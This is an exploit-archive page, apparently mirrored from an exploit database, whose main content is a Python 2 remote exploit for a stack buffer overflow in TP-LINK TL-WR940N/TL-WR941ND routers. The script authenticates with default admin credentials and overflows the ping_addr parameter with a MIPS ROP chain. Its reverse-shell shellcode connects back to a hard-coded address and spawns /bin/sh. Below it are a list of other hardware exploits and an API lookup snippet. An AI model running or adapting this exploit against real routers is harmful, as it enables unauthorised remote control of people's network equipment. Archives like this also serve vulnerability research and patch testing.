Menu

"TP-LINK TL-WR940N / TL-WR941ND - Buffer Overflow"

Author

"Grzegorz Wypych"

Platform

hardware

Release date

2019-04-09

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
#Author Grzegorz Wypych - h0rac
# TP-LINK TL-WR940N/TL-WR941ND buffer overflow remote shell exploit

import requests
import md5
import base64
import string
import struct
import socket

password = md5.new('admin').hexdigest()
cookie = base64.b64encode('admin:'+password)

print '[+] Authorization cookie: ', cookie
print '[+] Login to generate user directory...'
#proxy = {'http':'127.0.0.1:8080'}

loginUrl = 'http://192.168.0.1/userRpm/LoginRpm.htm?Save=Save'
headers = {'cookie':'Authorization=Basic%20'+cookie.replace('=', '%3D')}
req = requests.get(loginUrl, headers=headers)
directory = ''

nop = "\x27\xE0\xFF\xFF"

shellcode = string.join([
		"\x24\x0f\xff\xfa", # li	t7,-6
		"\x01\xe0\x78\x27", # nor	t7,t7,zero
		"\x21\xe4\xff\xfd", # addi	a0,t7,-3
		"\x21\xe5\xff\xfd", # addi	a1,t7,-3
		"\x28\x06\xff\xff", # slti	a2,zero,-1
		"\x24\x02\x10\x57", # li	v0,4183
		"\x01\x01\x01\x0c", # syscall	0x40404
		"\xaf\xa2\xff\xff", # sw	v0,-1(sp)
		"\x8f\xa4\xff\xff", # lw	a0,-1(sp)
		"\x34\x0f\xff\xfd", # li	t7,0xfffd
		"\x01\xe0\x78\x27", # nor	t7,t7,zero
		"\xaf\xaf\xff\xe0", # sw	t7,-32(sp)
		"\x3c\x0e\x1f\x90", # lui	t6,0x1f90
		"\x35\xce\x1f\x90", # ori	t6,t6,0x1f90
		"\xaf\xae\xff\xe4", # sw	t6,-28(sp)

		# Big endian IP address 172.28.128.4
                "\x3c\x0e\xc0\xA8"  # lui       t6,0x7f01
		#"\xac\x1c\x80\x04", # lui	t6,0x7f01
		"\x35\xce\x01\x64", # ori	t6,t6,0x101

		"\xaf\xae\xff\xe6", # sw	t6,-26(sp)
		"\x27\xa5\xff\xe2", # addiu	a1,sp,-30
		"\x24\x0c\xff\xef", # li	t4,-17
		"\x01\x80\x30\x27", # nor	a2,t4,zero
		"\x24\x02\x10\x4a", # li	v0,4170
		"\x01\x01\x01\x0c", # syscall	0x40404
		"\x24\x0f\xff\xfd", # li	t7,-3
		"\x01\xe0\x78\x27", # nor	t7,t7,zero
		"\x8f\xa4\xff\xff", # lw	a0,-1(sp)
		"\x01\xe0\x28\x21", # move	a1,t7
		"\x24\x02\x0f\xdf", # li	v0,4063
		"\x01\x01\x01\x0c", # syscall	0x40404
		"\x24\x10\xff\xff", # li	s0,-1
		"\x21\xef\xff\xff", # addi	t7,t7,-1
		"\x15\xf0\xff\xfa", # bne	t7,s0,68 <dup2_loop>
		"\x28\x06\xff\xff", # slti	a2,zero,-1
		"\x3c\x0f\x2f\x2f", # lui	t7,0x2f2f
		"\x35\xef\x62\x69", # ori	t7,t7,0x6269
		"\xaf\xaf\xff\xec", # sw	t7,-20(sp)
		"\x3c\x0e\x6e\x2f", # lui	t6,0x6e2f
		"\x35\xce\x73\x68", # ori	t6,t6,0x7368
		"\xaf\xae\xff\xf0", # sw	t6,-16(sp)
		"\xaf\xa0\xff\xf4", # sw	zero,-12(sp)
		"\x27\xa4\xff\xec", # addiu	a0,sp,-20
		"\xaf\xa4\xff\xf8", # sw	a0,-8(sp)
		"\xaf\xa0\xff\xfc", # sw	zero,-4(sp)
		"\x27\xa5\xff\xf8", # addiu	a1,sp,-8
		"\x24\x02\x0f\xab", # li	v0,4011
		"\x01\x01\x01\x0c"  # syscall	0x40404
            ], '')

libcBase= 0x77f53000
sleep = libcBase + 0x53CA0
gadget1 = libcBase + 0x00055c60 # addiu $a0, $zero, 1; move $t9, $s1; jalr $t9;
gadget2 = libcBase + 0x00024ecc #lw $ra, 0x2c($sp); lw $s1, 0x28($sp); lw $s0, 0x24($sp); jr $ra;
gadget3 = libcBase + 0x0001e20c # move $t9, $s1; lw $ra, 0x24($sp); lw $s2, 0x20($sp); lw $s1, 0x1c($sp); lw $s0, 0x18($sp); jr $t9
gadget4 = libcBase + 0x000195f4 #addiu $s0, $sp, 0x24; move $a0, $s0; move $t9, $s1; jalr $t9; 
gadget5 = libcBase + 0x000154d8 # #move $t9, $s0; jalr $t9; 


print "[+] First gadget address: ", hex(gadget1)
print "[+] Second gadget address: ", hex(gadget2) 
print "[+] Third gadget address: ", hex(gadget3)
print "[+] Fourth gadget address: ", hex(gadget4)
print "[+] Fifth gadget address: ", hex(gadget4)
print "[+] Sleep function address: ", hex(sleep)  
payload = "A"*160
s0 = "BBBB"
s1 = gadget2
payload += s0
payload += struct.pack('>I', s1)
payload += struct.pack('>I', gadget1) #Overwrite RA address
#New stack for gadget 2 starts
payload += "E" * 20 # adjust stack
payload += "FFFF" #gadget3 -> lw $s0, 0x18($sp) => 24 bytes
payload += "GGGG" #gadget3 -> lw $s1, 0x1c($sp) => 28 bytes
payload += "HHHH" #gadget3 -> lw $s2, 0x20($sp) => 32 bytes
payload += "AAAA"
payload += "CCCC"
payload += struct.pack('>I', sleep) #gadget2 -> lw $s1, 0x28($sp) => 40 bytes
payload += struct.pack('>I', gadget3) #gadget2 -> lw $ra, 0x2c($sp) => 44 bytes
#New stack for gadget 3 starts
payload += "G" *24
payload += "A"* 4 #lw $s0, 0x18($sp); sp + 24 bytes = s0
payload += struct.pack('>I', gadget5)#lw $s1, 0x1c($sp); sp + 28 bytes = s1 <= load gadget 5 addr
payload += "C" *4 #lw $s2, 0x20($sp); sp + 32 bytes = s2
payload += struct.pack('>I', gadget4) #lw $ra, 0x24($sp); sp + 36 bytes = ra <= load gadget 4 addr
#New stack for gadget 4 starts
payload += nop * 32  
payload += shellcode #addiu $s0, $sp, 0x24; sp + 36 bytes = s0

if(req.status_code):
    directory = req.text.split('=')[2].split('/')[3]
    print '[+] Retrieved folder name: ', directory
    req.close() 
    referer ='http://192.168.0.1/{0}/userRpm/DiagnosticRpm.htm'.format(directory)
  
    host = '192.168.0.1'
    port = 80

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    print "[*] Connected, sending payload {0} bytes...".format(len(payload))
    pingUrl = '{1}/userRpm/PingIframeRpm.htm'.format(host,directory)
    pingUrl += '?ping_addr='+payload+'&doType=ping&isNew=new&sendNum=4&psize=64&overTime=800&trHops=20'
    auth = 'Authorization=Basic%20'+cookie.replace('=', '%3D')
    pingReq = "GET /{0} HTTP/1.1\r\nHost: {1}\r\nReferer: {2}\r\ncookie: {3}\r\n\r\n".format(pingUrl, host, referer, auth)
    print "[+] Exploit request: {0}".format(pingReq)
    s.send(pingReq)
    s.recv(4096)
    s.close()
else:
    req.close()
Release Date Title Type Platform Author
2019-08-14 "D-Link DIR-600M - Authentication Bypass (Metasploit)" webapps hardware "Devendra Singh Solanki"
2019-08-12 "Cisco Adaptive Security Appliance - Path Traversal (Metasploit)" webapps hardware "Angelo Ruwantha"
2019-08-01 "Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery" webapps hardware "Alperen Soydan"
2019-07-30 "Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming" webapps hardware "Jacob Baines"
2019-07-24 "Cisco Wireless Controller 3.6.10E - Cross-Site Request Forgery" webapps hardware "Mehmet Onder"
2019-07-15 "CISCO Small Business 200 / 300 / 500 Switches - Multiple Vulnerabilities" webapps hardware Ramikan
2019-07-15 "NETGEAR WiFi Router JWNR2010v5 / R6080 - Authentication Bypass" webapps hardware Wadeek
2019-07-12 "Tenda D301 v2 Modem Router - Persistent Cross-Site Scripting" webapps hardware ABDO10
2019-07-01 "FaceSentry Access Control System 6.4.8 - Remote Root Exploit" webapps hardware LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Remote Command Injection" webapps hardware LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Remote SSH Root" remote hardware LiquidWorm
2019-06-25 "Fortinet FCM-MB40 - Cross-Site Request Forgery / Remote Command Execution" webapps hardware XORcat
2019-06-25 "SAPIDO RB-1732 - Remote Command Execution" remote hardware k1nm3n.aotoi
2019-06-17 "CleverDog Smart Camera DOG-2W / DOG-2W-V4 - Multiple Vulnerabilities" webapps hardware "Alex Akinbi"
2019-06-06 "Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion" webapps hardware "Dhiraj Mishra"
2019-06-03 "AUO Solar Data Recorder < 1.3.0 - Incorrect Access Control" webapps hardware Luca.Chiou
2019-06-04 "Cisco RV130W 1.0.3.44 - Remote Stack Overflow" remote hardware @0x00string
2019-06-04 "NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow" remote hardware @0x00string
2019-05-22 "Carel pCOWeb < B1.2.1 - Credentials Disclosure" webapps hardware Luca.Chiou
2019-05-22 "Carel pCOWeb < B1.2.1 - Cross-Site Scripting" webapps hardware Luca.Chiou
2019-05-22 "AUO Solar Data Recorder < 1.3.0 - 'addr' Cross-Site Scripting" webapps hardware Luca.Chiou
2019-05-21 "TP-LINK TL-WR840N v5 00000005 - Cross-Site Scripting" webapps hardware "purnendu ghosh"
2019-05-14 "D-Link DWL-2600AP - Multiple OS Command Injection" webapps hardware "Raki Ben Hamouda"
2019-05-10 "RICOH SP 4520DN Printer - HTML Injection" webapps hardware "Ismail Tasdelen"
2019-05-10 "RICOH SP 4510DN Printer - HTML Injection" webapps hardware "Ismail Tasdelen"
2019-05-06 "LG Supersign EZ CMS - Remote Code Execution (Metasploit)" remote hardware "Alejandro Fanjul"
2019-05-03 "Crestron AM/Barco wePresent WiPG/Extron ShareLink/Teq AV IT/SHARP PN-L703WA/Optoma WPS-Pro/Blackbox HD WPS/InFocus LiteShow - Remote Command Injection" webapps hardware "Jacob Baines"
2019-04-30 "Intelbras IWR 3000N 1.5.0 - Cross-Site Request Forgery" webapps hardware "Social Engineering Neo"
2019-04-30 "Intelbras IWR 3000N - Denial of Service (Remote Reboot)" webapps hardware "Social Engineering Neo"
Release Date Title Type Platform Author
2019-04-09 "TP-LINK TL-WR940N / TL-WR941ND - Buffer Overflow" remote hardware "Grzegorz Wypych"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46678/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46678/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46678/41125/tp-link-tl-wr940n-tl-wr941nd-buffer-overflow/download/", "exploit_id": "46678", "exploit_description": "\"TP-LINK TL-WR940N / TL-WR941ND - Buffer Overflow\"", "exploit_date": "2019-04-09", "exploit_author": "\"Grzegorz Wypych\"", "exploit_type": "remote", "exploit_platform": "hardware", "exploit_port": null}
                                            

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse